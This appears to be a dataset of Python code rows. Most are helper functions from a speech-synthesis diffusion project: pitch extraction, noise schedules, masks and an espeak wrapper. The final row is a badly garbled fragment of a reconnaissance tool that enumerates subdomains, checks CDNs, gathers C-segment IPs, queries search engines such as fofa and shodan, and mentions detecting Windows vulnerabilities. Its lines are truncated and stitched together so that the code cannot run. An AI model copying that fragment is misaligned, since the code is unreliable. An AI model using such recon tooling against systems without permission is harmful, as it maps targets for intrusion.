import torchaudio.transforms as T
from einops import rearrange, reduce, repeat
from einops.layers.torch import Rearrange, Reduce
from audiolm_pytorch import SoundStream, EncodecWrapper
from audiolm_pytorch.data import SoundDataset, get_dataloader
from beartype import beartype
from beartype.typing import Tuple, Union, Optional, List
from beartype.door import is_bearable
from naturalspeech2_pytorch.attend import Attend
from naturalspeech2_pytorch.aligner import Aligner, ForwardSumLoss, BinLoss
from naturalspeech2_pytorch.utils.tokenizer import Tokenizer, ESpeak
from naturalspeech2_pytorch.utils.utils import average_over_durations, create_mask
from naturalspeech2_pytorch.version import __version__
from accelerate import Accelerator
from ema_pytorch import EMA
from tqdm.auto import tqdm
import pyworld as pw
def generate_mask_from_repeats(repeats):
repeats = repeats.int()
device = repeats.device
lengths = repeats.sum(dim = -1)
max_length = lengths.amax().item()
cumsum = repeats.cumsum(dim = -1)
cumsum_exclusive = F.pad(cumsum, (1, -1), value = 0.)
seq = torch.arange(max_length, device = device)
seq = repeat(seq, '... j -> ... i j', i = repeats.shape[-1])
cumsum = rearrange(cumsum, '... i -> ... i 1')
cumsum_exclusive = rearrange(cumsum_exclusive, '... i -> ... i 1')
lengths = rearrange(lengths, 'b -> b 1 1')
mask = (seq < cumsum) & (seq >= cumsum_exclusive) & (seq < lengths)
return mask | null |
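For instance, expanding per-token repeat counts into a (batch, tokens, frames) mask (a small illustrative case):
repeats = torch.tensor([[2, 1, 3]])
mask = generate_mask_from_repeats(repeats)
# mask.shape == (1, 3, 6); token 0 covers frames 0-1, token 1 frame 2, token 2 frames 3-5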
189,242 | import math
import copy
from multiprocessing import cpu_count
from pathlib import Path
from random import random
from functools import partial
from collections import namedtuple
import numpy as np
import torch
import torch.nn.functional as F
from torch import nn, einsum, Tensor
from torch.optim import Adam
from torch.utils.data import Dataset, DataLoader
import torchaudio
import torchaudio.transforms as T
from einops import rearrange, reduce, repeat
from einops.layers.torch import Rearrange, Reduce
from audiolm_pytorch import SoundStream, EncodecWrapper
from audiolm_pytorch.data import SoundDataset, get_dataloader
from beartype import beartype
from beartype.typing import Tuple, Union, Optional, List
from beartype.door import is_bearable
from naturalspeech2_pytorch.attend import Attend
from naturalspeech2_pytorch.aligner import Aligner, ForwardSumLoss, BinLoss
from naturalspeech2_pytorch.utils.tokenizer import Tokenizer, ESpeak
from naturalspeech2_pytorch.utils.utils import average_over_durations, create_mask
from naturalspeech2_pytorch.version import __version__
from accelerate import Accelerator
from ema_pytorch import EMA
from tqdm.auto import tqdm
import pyworld as pw
def compute_pitch_pytorch(wav, sample_rate):
#https://pytorch.org/audio/main/generated/torchaudio.functional.compute_kaldi_pitch.html#torchaudio.functional.compute_kaldi_pitch
pitch_feature = torchaudio.functional.compute_kaldi_pitch(wav, sample_rate)
pitch, nfcc = pitch_feature.unbind(dim = -1)
return pitch | null |
189,243 | import math
import copy
from multiprocessing import cpu_count
from pathlib import Path
from random import random
from functools import partial
from collections import namedtuple
import numpy as np
import torch
import torch.nn.functional as F
from torch import nn, einsum, Tensor
from torch.optim import Adam
from torch.utils.data import Dataset, DataLoader
import torchaudio
import torchaudio.transforms as T
from einops import rearrange, reduce, repeat
from einops.layers.torch import Rearrange, Reduce
from audiolm_pytorch import SoundStream, EncodecWrapper
from audiolm_pytorch.data import SoundDataset, get_dataloader
from beartype import beartype
from beartype.typing import Tuple, Union, Optional, List
from beartype.door import is_bearable
from naturalspeech2_pytorch.attend import Attend
from naturalspeech2_pytorch.aligner import Aligner, ForwardSumLoss, BinLoss
from naturalspeech2_pytorch.utils.tokenizer import Tokenizer, ESpeak
from naturalspeech2_pytorch.utils.utils import average_over_durations, create_mask
from naturalspeech2_pytorch.version import __version__
from accelerate import Accelerator
from ema_pytorch import EMA
from tqdm.auto import tqdm
import pyworld as pw
def divisible_by(num, den):
    return (num % den) == 0
def compute_pitch_pyworld(wav, sample_rate, hop_length, pitch_fmax=640.0):
is_tensor_input = torch.is_tensor(wav)
if is_tensor_input:
device = wav.device
wav = wav.contiguous().cpu().numpy()
if divisible_by(len(wav), hop_length):
wav = np.pad(wav, (0, hop_length // 2), mode="reflect")
wav = wav.astype(np.double)
outs = []
for sample in wav:
f0, t = pw.dio(
sample,
fs = sample_rate,
f0_ceil = pitch_fmax,
frame_period = 1000 * hop_length / sample_rate,
)
f0 = pw.stonemask(sample, f0, t, sample_rate)
outs.append(f0)
outs = np.stack(outs)
if is_tensor_input:
outs = torch.from_numpy(outs).to(device)
return outs | null |
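A hedged example on a batch of one second of random audio (pyworld must be installed; the numbers are illustrative):
sample_rate, hop_length = 16000, 256
wav = torch.randn(1, sample_rate)                          # (batch, samples)
f0 = compute_pitch_pyworld(wav, sample_rate, hop_length)   # (1, frames) f0 track in Hz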
189,244 | import math
import copy
from multiprocessing import cpu_count
from pathlib import Path
from random import random
from functools import partial
from collections import namedtuple
import numpy as np
import torch
import torch.nn.functional as F
from torch import nn, einsum, Tensor
from torch.optim import Adam
from torch.utils.data import Dataset, DataLoader
import torchaudio
import torchaudio.transforms as T
from einops import rearrange, reduce, repeat
from einops.layers.torch import Rearrange, Reduce
from audiolm_pytorch import SoundStream, EncodecWrapper
from audiolm_pytorch.data import SoundDataset, get_dataloader
from beartype import beartype
from beartype.typing import Tuple, Union, Optional, List
from beartype.door import is_bearable
from naturalspeech2_pytorch.attend import Attend
from naturalspeech2_pytorch.aligner import Aligner, ForwardSumLoss, BinLoss
from naturalspeech2_pytorch.utils.tokenizer import Tokenizer, ESpeak
from naturalspeech2_pytorch.utils.utils import average_over_durations, create_mask
from naturalspeech2_pytorch.version import __version__
from accelerate import Accelerator
from ema_pytorch import EMA
from tqdm.auto import tqdm
import pyworld as pw
def log(t, eps = 1e-20):
return torch.log(t.clamp(min = eps))
def f0_to_coarse(f0, f0_bin = 256, f0_max = 1100.0, f0_min = 50.0):
f0_mel_max = 1127 * torch.log(1 + torch.tensor(f0_max) / 700)
f0_mel_min = 1127 * torch.log(1 + torch.tensor(f0_min) / 700)
f0_mel = 1127 * (1 + f0 / 700).log()
f0_mel[f0_mel > 0] = (f0_mel[f0_mel > 0] - f0_mel_min) * (f0_bin - 2) / (f0_mel_max - f0_mel_min) + 1
f0_mel[f0_mel <= 1] = 1
f0_mel[f0_mel > f0_bin - 1] = f0_bin - 1
f0_coarse = (f0_mel + 0.5).int()
assert f0_coarse.max() <= 255 and f0_coarse.min() >= 1, (f0_coarse.max(), f0_coarse.min())
return f0_coarse | null |
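For example, quantizing a few pitch values (Hz) into the 1-255 coarse bins:
f0 = torch.tensor([0.0, 110.0, 440.0])
bins = f0_to_coarse(f0)   # integer bins in [1, 255]; unvoiced (0 Hz) frames map to bin 1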
189,245 | import math
import copy
from multiprocessing import cpu_count
from pathlib import Path
from random import random
from functools import partial
from collections import namedtuple
import numpy as np
import torch
import torch.nn.functional as F
from torch import nn, einsum, Tensor
from torch.optim import Adam
from torch.utils.data import Dataset, DataLoader
import torchaudio
import torchaudio.transforms as T
from einops import rearrange, reduce, repeat
from einops.layers.torch import Rearrange, Reduce
from audiolm_pytorch import SoundStream, EncodecWrapper
from audiolm_pytorch.data import SoundDataset, get_dataloader
from beartype import beartype
from beartype.typing import Tuple, Union, Optional, List
from beartype.door import is_bearable
from naturalspeech2_pytorch.attend import Attend
from naturalspeech2_pytorch.aligner import Aligner, ForwardSumLoss, BinLoss
from naturalspeech2_pytorch.utils.tokenizer import Tokenizer, ESpeak
from naturalspeech2_pytorch.utils.utils import average_over_durations, create_mask
from naturalspeech2_pytorch.version import __version__
from accelerate import Accelerator
from ema_pytorch import EMA
from tqdm.auto import tqdm
import pyworld as pw
def Sequential(*mods):
return nn.Sequential(*filter(exists, mods))
def ConvBlock(dim, dim_out, kernel, dropout = 0.):
return nn.Sequential(
Rearrange('b n c -> b c n'),
nn.Conv1d(dim, dim_out, kernel, padding = kernel // 2),
nn.SiLU(),
nn.Dropout(dropout),
Rearrange('b c n -> b n c'),
) | null |
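ConvBlock keeps the (batch, length, channels) layout by rearranging around the 1-D convolution; a quick shape check:
block = ConvBlock(dim=80, dim_out=128, kernel=3)
out = block(torch.randn(2, 100, 80))   # -> (2, 100, 128)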
189,246 | import math
import copy
from multiprocessing import cpu_count
from pathlib import Path
from random import random
from functools import partial
from collections import namedtuple
import numpy as np
import torch
import torch.nn.functional as F
from torch import nn, einsum, Tensor
from torch.optim import Adam
from torch.utils.data import Dataset, DataLoader
import torchaudio
import torchaudio.transforms as T
from einops import rearrange, reduce, repeat
from einops.layers.torch import Rearrange, Reduce
from audiolm_pytorch import SoundStream, EncodecWrapper
from audiolm_pytorch.data import SoundDataset, get_dataloader
from beartype import beartype
from beartype.typing import Tuple, Union, Optional, List
from beartype.door import is_bearable
from naturalspeech2_pytorch.attend import Attend
from naturalspeech2_pytorch.aligner import Aligner, ForwardSumLoss, BinLoss
from naturalspeech2_pytorch.utils.tokenizer import Tokenizer, ESpeak
from naturalspeech2_pytorch.utils.utils import average_over_durations, create_mask
from naturalspeech2_pytorch.version import __version__
from accelerate import Accelerator
from ema_pytorch import EMA
from tqdm.auto import tqdm
import pyworld as pw
def Sequential(*mods):
return nn.Sequential(*filter(exists, mods))
class CausalConv1d(nn.Conv1d):
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
kernel_size, = self.kernel_size
dilation, = self.dilation
stride, = self.stride
assert stride == 1
self.causal_padding = dilation * (kernel_size - 1)
def forward(self, x):
causal_padded_x = F.pad(x, (self.causal_padding, 0), value = 0.)
return super().forward(causal_padded_x)
class GEGLU(nn.Module):
def forward(self, x):
x, gate = x.chunk(2, dim = -1)
return F.gelu(gate) * x
def FeedForward(dim, mult = 4, causal_conv = False):
dim_inner = int(dim * mult * 2 / 3)
conv = None
if causal_conv:
conv = nn.Sequential(
Rearrange('b n d -> b d n'),
CausalConv1d(dim_inner, dim_inner, 3),
Rearrange('b d n -> b n d'),
)
return Sequential(
nn.Linear(dim, dim_inner * 2),
GEGLU(),
conv,
nn.Linear(dim_inner, dim)
) | null |
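A shape-preserving check of the GEGLU feed-forward (relies on the exists helper defined in earlier rows):
ff = FeedForward(dim=256, causal_conv=True)
out = ff(torch.randn(1, 50, 256))   # -> (1, 50, 256)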
189,247 | import math
import copy
from multiprocessing import cpu_count
from pathlib import Path
from random import random
from functools import partial
from collections import namedtuple
import numpy as np
import torch
import torch.nn.functional as F
from torch import nn, einsum, Tensor
from torch.optim import Adam
from torch.utils.data import Dataset, DataLoader
import torchaudio
import torchaudio.transforms as T
from einops import rearrange, reduce, repeat
from einops.layers.torch import Rearrange, Reduce
from audiolm_pytorch import SoundStream, EncodecWrapper
from audiolm_pytorch.data import SoundDataset, get_dataloader
from beartype import beartype
from beartype.typing import Tuple, Union, Optional, List
from beartype.door import is_bearable
from naturalspeech2_pytorch.attend import Attend
from naturalspeech2_pytorch.aligner import Aligner, ForwardSumLoss, BinLoss
from naturalspeech2_pytorch.utils.tokenizer import Tokenizer, ESpeak
from naturalspeech2_pytorch.utils.utils import average_over_durations, create_mask
from naturalspeech2_pytorch.version import __version__
from accelerate import Accelerator
from ema_pytorch import EMA
from tqdm.auto import tqdm
import pyworld as pw
def safe_div(numer, denom):
return numer / denom.clamp(min = 1e-10) | null |
189,248 | import math
import copy
from multiprocessing import cpu_count
from pathlib import Path
from random import random
from functools import partial
from collections import namedtuple
import numpy as np
import torch
import torch.nn.functional as F
from torch import nn, einsum, Tensor
from torch.optim import Adam
from torch.utils.data import Dataset, DataLoader
import torchaudio
import torchaudio.transforms as T
from einops import rearrange, reduce, repeat
from einops.layers.torch import Rearrange, Reduce
from audiolm_pytorch import SoundStream, EncodecWrapper
from audiolm_pytorch.data import SoundDataset, get_dataloader
from beartype import beartype
from beartype.typing import Tuple, Union, Optional, List
from beartype.door import is_bearable
from naturalspeech2_pytorch.attend import Attend
from naturalspeech2_pytorch.aligner import Aligner, ForwardSumLoss, BinLoss
from naturalspeech2_pytorch.utils.tokenizer import Tokenizer, ESpeak
from naturalspeech2_pytorch.utils.utils import average_over_durations, create_mask
from naturalspeech2_pytorch.version import __version__
from accelerate import Accelerator
from ema_pytorch import EMA
from tqdm.auto import tqdm
import pyworld as pw
def right_pad_dims_to(x, t):
padding_dims = x.ndim - t.ndim
if padding_dims <= 0:
return t
return t.view(*t.shape, *((1,) * padding_dims)) | null |
189,249 | import math
import copy
from multiprocessing import cpu_count
from pathlib import Path
from random import random
from functools import partial
from collections import namedtuple
import numpy as np
import torch
import torch.nn.functional as F
from torch import nn, einsum, Tensor
from torch.optim import Adam
from torch.utils.data import Dataset, DataLoader
import torchaudio
import torchaudio.transforms as T
from einops import rearrange, reduce, repeat
from einops.layers.torch import Rearrange, Reduce
from audiolm_pytorch import SoundStream, EncodecWrapper
from audiolm_pytorch.data import SoundDataset, get_dataloader
from beartype import beartype
from beartype.typing import Tuple, Union, Optional, List
from beartype.door import is_bearable
from naturalspeech2_pytorch.attend import Attend
from naturalspeech2_pytorch.aligner import Aligner, ForwardSumLoss, BinLoss
from naturalspeech2_pytorch.utils.tokenizer import Tokenizer, ESpeak
from naturalspeech2_pytorch.utils.utils import average_over_durations, create_mask
from naturalspeech2_pytorch.version import __version__
from accelerate import Accelerator
from ema_pytorch import EMA
from tqdm.auto import tqdm
import pyworld as pw
def simple_linear_schedule(t, clip_min = 1e-9):
return (1 - t).clamp(min = clip_min) | null |
189,250 | import math
import copy
from multiprocessing import cpu_count
from pathlib import Path
from random import random
from functools import partial
from collections import namedtuple
import numpy as np
import torch
import torch.nn.functional as F
from torch import nn, einsum, Tensor
from torch.optim import Adam
from torch.utils.data import Dataset, DataLoader
import torchaudio
import torchaudio.transforms as T
from einops import rearrange, reduce, repeat
from einops.layers.torch import Rearrange, Reduce
from audiolm_pytorch import SoundStream, EncodecWrapper
from audiolm_pytorch.data import SoundDataset, get_dataloader
from beartype import beartype
from beartype.typing import Tuple, Union, Optional, List
from beartype.door import is_bearable
from naturalspeech2_pytorch.attend import Attend
from naturalspeech2_pytorch.aligner import Aligner, ForwardSumLoss, BinLoss
from naturalspeech2_pytorch.utils.tokenizer import Tokenizer, ESpeak
from naturalspeech2_pytorch.utils.utils import average_over_durations, create_mask
from naturalspeech2_pytorch.version import __version__
from accelerate import Accelerator
from ema_pytorch import EMA
from tqdm.auto import tqdm
import pyworld as pw
def cosine_schedule(t, start = 0, end = 1, tau = 1, clip_min = 1e-9):
power = 2 * tau
v_start = math.cos(start * math.pi / 2) ** power
v_end = math.cos(end * math.pi / 2) ** power
    output = torch.cos((t * (end - start) + start) * math.pi / 2) ** power  # torch.cos so tensor-valued t works and .clamp below is valid
output = (v_end - output) / (v_end - v_start)
return output.clamp(min = clip_min) | null |
189,251 | import math
import copy
from multiprocessing import cpu_count
from pathlib import Path
from random import random
from functools import partial
from collections import namedtuple
import numpy as np
import torch
import torch.nn.functional as F
from torch import nn, einsum, Tensor
from torch.optim import Adam
from torch.utils.data import Dataset, DataLoader
import torchaudio
import torchaudio.transforms as T
from einops import rearrange, reduce, repeat
from einops.layers.torch import Rearrange, Reduce
from audiolm_pytorch import SoundStream, EncodecWrapper
from audiolm_pytorch.data import SoundDataset, get_dataloader
from beartype import beartype
from beartype.typing import Tuple, Union, Optional, List
from beartype.door import is_bearable
from naturalspeech2_pytorch.attend import Attend
from naturalspeech2_pytorch.aligner import Aligner, ForwardSumLoss, BinLoss
from naturalspeech2_pytorch.utils.tokenizer import Tokenizer, ESpeak
from naturalspeech2_pytorch.utils.utils import average_over_durations, create_mask
from naturalspeech2_pytorch.version import __version__
from accelerate import Accelerator
from ema_pytorch import EMA
from tqdm.auto import tqdm
import pyworld as pw
def sigmoid_schedule(t, start = -3, end = 3, tau = 1, clamp_min = 1e-9):
v_start = torch.tensor(start / tau).sigmoid()
v_end = torch.tensor(end / tau).sigmoid()
gamma = (-((t * (end - start) + start) / tau).sigmoid() + v_end) / (v_end - v_start)
return gamma.clamp_(min = clamp_min, max = 1.) | null |
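Both schedules map a diffusion time t in [0, 1] to a gamma value near 1 at t=0 that decays toward 0 at t=1; a quick evaluation (cosine_schedule is from the previous row):
t = torch.linspace(0., 1., steps=5)
gammas_cos = cosine_schedule(t)
gammas_sig = sigmoid_schedule(t)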
189,252 | import math
import copy
from multiprocessing import cpu_count
from pathlib import Path
from random import random
from functools import partial
from collections import namedtuple
import numpy as np
import torch
import torch.nn.functional as F
from torch import nn, einsum, Tensor
from torch.optim import Adam
from torch.utils.data import Dataset, DataLoader
import torchaudio
import torchaudio.transforms as T
from einops import rearrange, reduce, repeat
from einops.layers.torch import Rearrange, Reduce
from audiolm_pytorch import SoundStream, EncodecWrapper
from audiolm_pytorch.data import SoundDataset, get_dataloader
from beartype import beartype
from beartype.typing import Tuple, Union, Optional, List
from beartype.door import is_bearable
from naturalspeech2_pytorch.attend import Attend
from naturalspeech2_pytorch.aligner import Aligner, ForwardSumLoss, BinLoss
from naturalspeech2_pytorch.utils.tokenizer import Tokenizer, ESpeak
from naturalspeech2_pytorch.utils.utils import average_over_durations, create_mask
from naturalspeech2_pytorch.version import __version__
from accelerate import Accelerator
from ema_pytorch import EMA
from tqdm.auto import tqdm
import pyworld as pw
def gamma_to_alpha_sigma(gamma, scale = 1):
return torch.sqrt(gamma) * scale, torch.sqrt(1 - gamma) | null |
189,253 | import math
import copy
from multiprocessing import cpu_count
from pathlib import Path
from random import random
from functools import partial
from collections import namedtuple
import numpy as np
import torch
import torch.nn.functional as F
from torch import nn, einsum, Tensor
from torch.optim import Adam
from torch.utils.data import Dataset, DataLoader
import torchaudio
import torchaudio.transforms as T
from einops import rearrange, reduce, repeat
from einops.layers.torch import Rearrange, Reduce
from audiolm_pytorch import SoundStream, EncodecWrapper
from audiolm_pytorch.data import SoundDataset, get_dataloader
from beartype import beartype
from beartype.typing import Tuple, Union, Optional, List
from beartype.door import is_bearable
from naturalspeech2_pytorch.attend import Attend
from naturalspeech2_pytorch.aligner import Aligner, ForwardSumLoss, BinLoss
from naturalspeech2_pytorch.utils.tokenizer import Tokenizer, ESpeak
from naturalspeech2_pytorch.utils.utils import average_over_durations, create_mask
from naturalspeech2_pytorch.version import __version__
from accelerate import Accelerator
from ema_pytorch import EMA
from tqdm.auto import tqdm
import pyworld as pw
def log(t, eps = 1e-20):
return torch.log(t.clamp(min = eps))
def gamma_to_log_snr(gamma, scale = 1, eps = 1e-5):
return log(gamma * (scale ** 2) / (1 - gamma), eps = eps) | null |
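Putting the pieces together: a gamma value converts to its alpha/sigma pair and log-SNR (gamma_to_alpha_sigma is from the previous rows):
gamma = torch.tensor(0.9)
alpha, sigma = gamma_to_alpha_sigma(gamma)   # sqrt(0.9), sqrt(0.1)
log_snr = gamma_to_log_snr(gamma)            # log(0.9 / 0.1) ≈ 2.197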
189,254 | import math
import copy
from multiprocessing import cpu_count
from pathlib import Path
from random import random
from functools import partial
from collections import namedtuple
import numpy as np
import torch
import torch.nn.functional as F
from torch import nn, einsum, Tensor
from torch.optim import Adam
from torch.utils.data import Dataset, DataLoader
import torchaudio
import torchaudio.transforms as T
from einops import rearrange, reduce, repeat
from einops.layers.torch import Rearrange, Reduce
from audiolm_pytorch import SoundStream, EncodecWrapper
from audiolm_pytorch.data import SoundDataset, get_dataloader
from beartype import beartype
from beartype.typing import Tuple, Union, Optional, List
from beartype.door import is_bearable
from naturalspeech2_pytorch.attend import Attend
from naturalspeech2_pytorch.aligner import Aligner, ForwardSumLoss, BinLoss
from naturalspeech2_pytorch.utils.tokenizer import Tokenizer, ESpeak
from naturalspeech2_pytorch.utils.utils import average_over_durations, create_mask
from naturalspeech2_pytorch.version import __version__
from accelerate import Accelerator
from ema_pytorch import EMA
from tqdm.auto import tqdm
import pyworld as pw
def cycle(dl):
while True:
for data in dl:
yield data | null |
189,255 | import logging
import re
import subprocess
from typing import Dict, List
from packaging.version import Version
from naturalspeech2_pytorch.utils.phonemizers.base import BasePhonemizer
from naturalspeech2_pytorch.utils.phonemizers.punctuation import Punctuation
def is_tool(name):
from shutil import which
return which(name) is not None | null |
189,256 | import logging
import re
import subprocess
from typing import Dict, List
from packaging.version import Version
from naturalspeech2_pytorch.utils.phonemizers.base import BasePhonemizer
from naturalspeech2_pytorch.utils.phonemizers.punctuation import Punctuation
espeak_version_pattern = re.compile(r"text-to-speech:\s(?P<version>\d+\.\d+(\.\d+)?)")
def get_espeak_version():
output = subprocess.getoutput("espeak --version")
match = espeak_version_pattern.search(output)
return match.group("version") | null |
189,257 | import logging
import re
import subprocess
from typing import Dict, List
from packaging.version import Version
from naturalspeech2_pytorch.utils.phonemizers.base import BasePhonemizer
from naturalspeech2_pytorch.utils.phonemizers.punctuation import Punctuation
def get_espeakng_version():
output = subprocess.getoutput("espeak-ng --version")
return output.split()[3] | null |
189,258 | import logging
import re
import subprocess
from typing import Dict, List
from packaging.version import Version
from naturalspeech2_pytorch.utils.phonemizers.base import BasePhonemizer
from naturalspeech2_pytorch.utils.phonemizers.punctuation import Punctuation
The provided code snippet includes necessary dependencies for implementing the `_espeak_exe` function. Write a Python function `def _espeak_exe(espeak_lib: str, args: List, sync=False) -> List[str]` to solve the following problem:
Run espeak with the given arguments.
Here is the function:
def _espeak_exe(espeak_lib: str, args: List, sync=False) -> List[str]:
"""Run espeak with the given arguments."""
cmd = [
espeak_lib,
"-q",
"-b",
"1", # UTF8 text encoding
]
cmd.extend(args)
logging.debug("espeakng: executing %s", repr(cmd))
with subprocess.Popen(
cmd,
stdout=subprocess.PIPE,
stderr=subprocess.STDOUT,
) as p:
res = iter(p.stdout.readline, b"")
if not sync:
p.stdout.close()
if p.stderr:
p.stderr.close()
if p.stdin:
p.stdin.close()
return res
res2 = []
for line in res:
res2.append(line)
p.stdout.close()
if p.stderr:
p.stderr.close()
if p.stdin:
p.stdin.close()
p.wait()
return res2 | Run espeak with the given arguments. |
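For instance, querying the installed backend synchronously (assumes an espeak-ng binary on PATH; output lines are bytes):
lines = _espeak_exe("espeak-ng", ["--version"], sync=True)
print(b"".join(lines).decode())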
189,259 | import torch
from torch import Tensor
from typing import Callable, List, Optional, Tuple
from torch.nn.utils.rnn import pad_sequence
from naturalspeech2_pytorch.utils.cleaner import TextProcessor
from naturalspeech2_pytorch.utils.phonemizers.espeak_wrapper import ESpeak
def exists(val):
    return val is not None
def default(val, d):
return val if exists(val) else d | null |
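Typical use of these helpers for optional arguments:
print(default(None, 0.5))  # -> 0.5, falls back to the default
print(default(0.1, 0.5))   # -> 0.1, the given value wins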
189,260 | import torch
from einops import repeat, rearrange
The provided code snippet includes necessary dependencies for implementing the `average_over_durations` function. Write a Python function `def average_over_durations(values, durs)` to solve the following problem:
- in: - values: B, 1, T_de - durs: B, T_en - out: - avg: B, 1, T_en
Here is the function:
def average_over_durations(values, durs):
"""
- in:
- values: B, 1, T_de
- durs: B, T_en
- out:
- avg: B, 1, T_en
"""
durs_cums_ends = torch.cumsum(durs, dim=1).long()
durs_cums_starts = torch.nn.functional.pad(durs_cums_ends[:, :-1], (1, 0))
values_nonzero_cums = torch.nn.functional.pad(torch.cumsum(values != 0.0, dim=2), (1, 0))
values_cums = torch.nn.functional.pad(torch.cumsum(values, dim=2), (1, 0))
bs, l = durs_cums_ends.size()
n_formants = values.size(1)
dcs = repeat(durs_cums_starts, 'bs l -> bs n l', n=n_formants)
dce = repeat(durs_cums_ends, 'bs l -> bs n l', n=n_formants)
values_sums = (torch.gather(values_cums, 2, dce) - torch.gather(values_cums, 2, dcs)).to(values.dtype)
values_nelems = (torch.gather(values_nonzero_cums, 2, dce) - torch.gather(values_nonzero_cums, 2, dcs)).to(values.dtype)
avg = torch.where(values_nelems == 0.0, values_nelems, values_sums / values_nelems).to(values.dtype)
return avg | - in: - values: B, 1, T_de - durs: B, T_en - out: - avg: B, 1, T_en |
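A small worked example (shapes follow the docstring; the durations must sum to T_de):
values = torch.tensor([[[1., 2., 3., 4., 5., 6.]]])  # B=1, 1, T_de=6 decoder frames
durs = torch.tensor([[2, 1, 3]])                      # B=1, T_en=3 phoneme durations
print(average_over_durations(values, durs))           # -> tensor([[[1.5000, 3.0000, 5.0000]]])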
189,261 | import torch
from einops import repeat, rearrange
def create_mask(sequence_length, max_len):
dtype, device = sequence_length.dtype, sequence_length.device
seq_range = torch.arange(max_len, dtype=dtype, device=device)
sequence_length = rearrange(sequence_length, 'b -> b 1')
seq_range = rearrange(seq_range, 't -> 1 t')
return seq_range < sequence_length | null |
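Example: boolean padding mask for sequences of length 2 and 4 with max_len 5:
lengths = torch.tensor([2, 4])
print(create_mask(lengths, 5))
# tensor([[ True,  True, False, False, False],
#         [ True,  True,  True,  True, False]])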
189,262 | import sys
import os
import urllib3
import openpyxl
from uuid import uuid4
import dns.resolver
import re
from threading import Thread
from IPy import IP
from collections import Counter
from queue import Queue
from urllib.parse import urlparse
from termcolor import cprint
from optparse import OptionParser
import os
import platform
from Plugins.saveToExcel import saveToExcel
from uuid import uuid4
import socket
import socks
import configparser
from tqdm import *
from colorama import Fore
import requests
def subdomains3():
cprint('-' * 50 + 'Load subdomains3 ...' + '-' * 50, 'green')
from Plugins.infoGather.subdomain.subdomain3.brutedns import run_subdomains
Subdomains_ips = run_subdomains(domain)
return Subdomains_ips
():
cprint('-' * 50 + 'Load getSocksProxy ...' + '-' * 50, 'green')
from Plugins.infoGather.SocksProxy.getSocksProxy import run_getSocksProxy
cprint('-' * 50 + 'Load beian2NewDomain ...' + '-' * 50, 'green')
from Plugins.infoGather.subdomain.beian2NewDomain.beian2domain import run_beian2domain
cprint('-' * 50 + 'Load Aiqicha ...' + '-' * 50, 'green')
cprint("查询【{}】公司架构".format(companyName), 'red')
from Plugins.infoGather.subdomain.Aiqicha.Aiqicha import run_aiqicha
():
cprint('-' * 50 + 'check Pan-Analysis ...' + '-' * 50, 'green')
cprint('-' * 50 + 'Load ksubdomain ...' + '-' * 50, 'green')
from Plugins.infoGather.subdomain.ksubdomain.ksubdomain import run_ksubdomain
():
cprint('-' * 50 + 'Load theHarvest ...' + '-' * 50, 'green')
from Plugins.infoGather.subdomain.theHarvester.theHarvester import run_theHarvester
subdomain = None
    cprint('-' * 50 + 'Load verifyEmails ...' + '-' * 50, 'green')
from Plugins.infoGather.subdomain.verifyEmails.VerifyEmails import run_verifyEmails
cprint('-' * 50 + 'Load VirusTotal threatcrowd url.fht.im ...' + '-' * 50, 'green')
from Plugins.infoGather.subdomain.othersApiSubdomains.othersApiSubdomains import othersApiRun
():
cprint('-' * 50 + 'Load Github Api Subdomain ...' + '-' * 50, 'green')
from Plugins.infoGather.subdomain.githubSubdomains.githubSubdomains import githubApiRun
from Plugins.infoGather.subdomain.Sublist3r.sublist3r import sublist3rRun
cprint('-' * 50 + 'Load Spider ...' + '-' * 50, 'green')
    cprint('-' * 50 + 'Load crawlCerts ...' + '-' * 50, 'green')
    from Plugins.infoGather.subdomain.Certs.crawlCerts import crawlCerts
    from Plugins.infoGather.subdomain.FriendChins.crawlFriendChins import FriendChins
Subdomains_ips,
cprint('-' * 50 + 'check subdomains CDN and query ip ...' + '-' * 50, 'green')
for subdomain in subdomains:
if '.{}'.format(domain) in subdomain:
tmp_subdomains.append(subdomain)
from Plugins.infoGather.subdomain.CDN import checkCDN
from Plugins.infoGather.subdomain.queryA import queryA
Subdomains_ips = queryA.run_queryA(Subdomains_ips, subdomains)
    return Subdomains_ips, CDNSubdomainsDict, notCDNSubdomains
def run_hostCollide(Subdomains_ips):
    cprint('-' * 50 + 'run_hostCollide ...' + '-' * 50, 'green')
    from Plugins.infoGather.subdomain.hostCollide import hostCollide
    from Plugins.infoGather.ParamSpider.paramSpider import getParamLinks
def get_CIP(Subdomains_ips, CDNSubdomainsDict, censysIPS):
cprint('-' * 50 + 'get_CIP ...' + '-' * 50, 'green')
for subdomain in Subdomains_ips:
        if CDNSubdomainsDict[subdomain] == 'NOT':  # if this subdomain is not behind a CDN, start counting its resolved IPs
ip_List = Subdomains_ips[subdomain]
for ip in ip_List:
if not is_internal_ip(ip):
ips.append(ip)
cprint(ip_count, 'red')
import configparser
    cprint('-' * 50 + 'run_webSpace ...' + '-' * 50, 'green')
    from Plugins.infoGather.WebspaceSearchEngine import fofaApi, shodanApi, quakeApi, qianxinApi
    from Plugins.infoGather.subdomain.ip2domain import getIp2Domain
    from Plugins.infoGather.subdomain.ipAddress import getIpAddress
    cprint('-' * 50 + 'collation_web_host ...' + '-' * 50, 'green')
for subdomain in list(set(list(Subdomains_ips.keys()) + ip2domainSubdomains)):
    if ':' in subdomain:  # some ip2domain results look like 221.192.236.146:999, so do not append port 80
web_host_port_temp.append(subdomain)
else:
web_host_port_temp.append('{}:80'.format(subdomain))
from Plugins.infoGather.Intranet import getMoreIp
    from Plugins.infoGather.webInfo import getWebTitle
    cprint('-' * 50 + 'detect Windows vul' + '-' * 50, 'green')
Subdomains_ips = {}
eryA_subdomains(Subdomains_ips, subdomains)
for subdomain in notCDNSubdomains:
for ip in Subdomains_ips[subdomain]:
SubdomainAndNotCDNIPs.append(ip)
    webSpace_web_host_port, webSpace_service_host_port = run_webSpace(domain, SubdomainAndNotCDNIPs, [], '')
else:
webSpace_web_host_port, webSpace_service_host_port = run_webSpace(domain, [], CIP_List, '') # 网络空间引擎(fofa、shodan)获取的开放web服务的host(IP/domain)
for subdomain in Subdomains_ips.keys():
for ip in Subdomains_ips[subdomain]:
allTargets_Queue.put(ip)
allTargets_List.append(ip)
cprint(r'新的域名:{}'.format(newDomains), 'green')
cprint(r'C段IP:{}'.format(CIP_List), 'green')
cprint(r'资产信息保存路径:{}'.format('{}/{}.xlsx'.format(save_fold_path, excel_name)), 'green')
cprint(r'Github信息保存路径:{}/{}_github.txt'.format(save_fold_path, domain), 'green')
if domain:
ret = ""
for cip in CIP_List:
ret += cip
ret += ","
cprint(r"请使用-c功能跑C段资产", 'green')
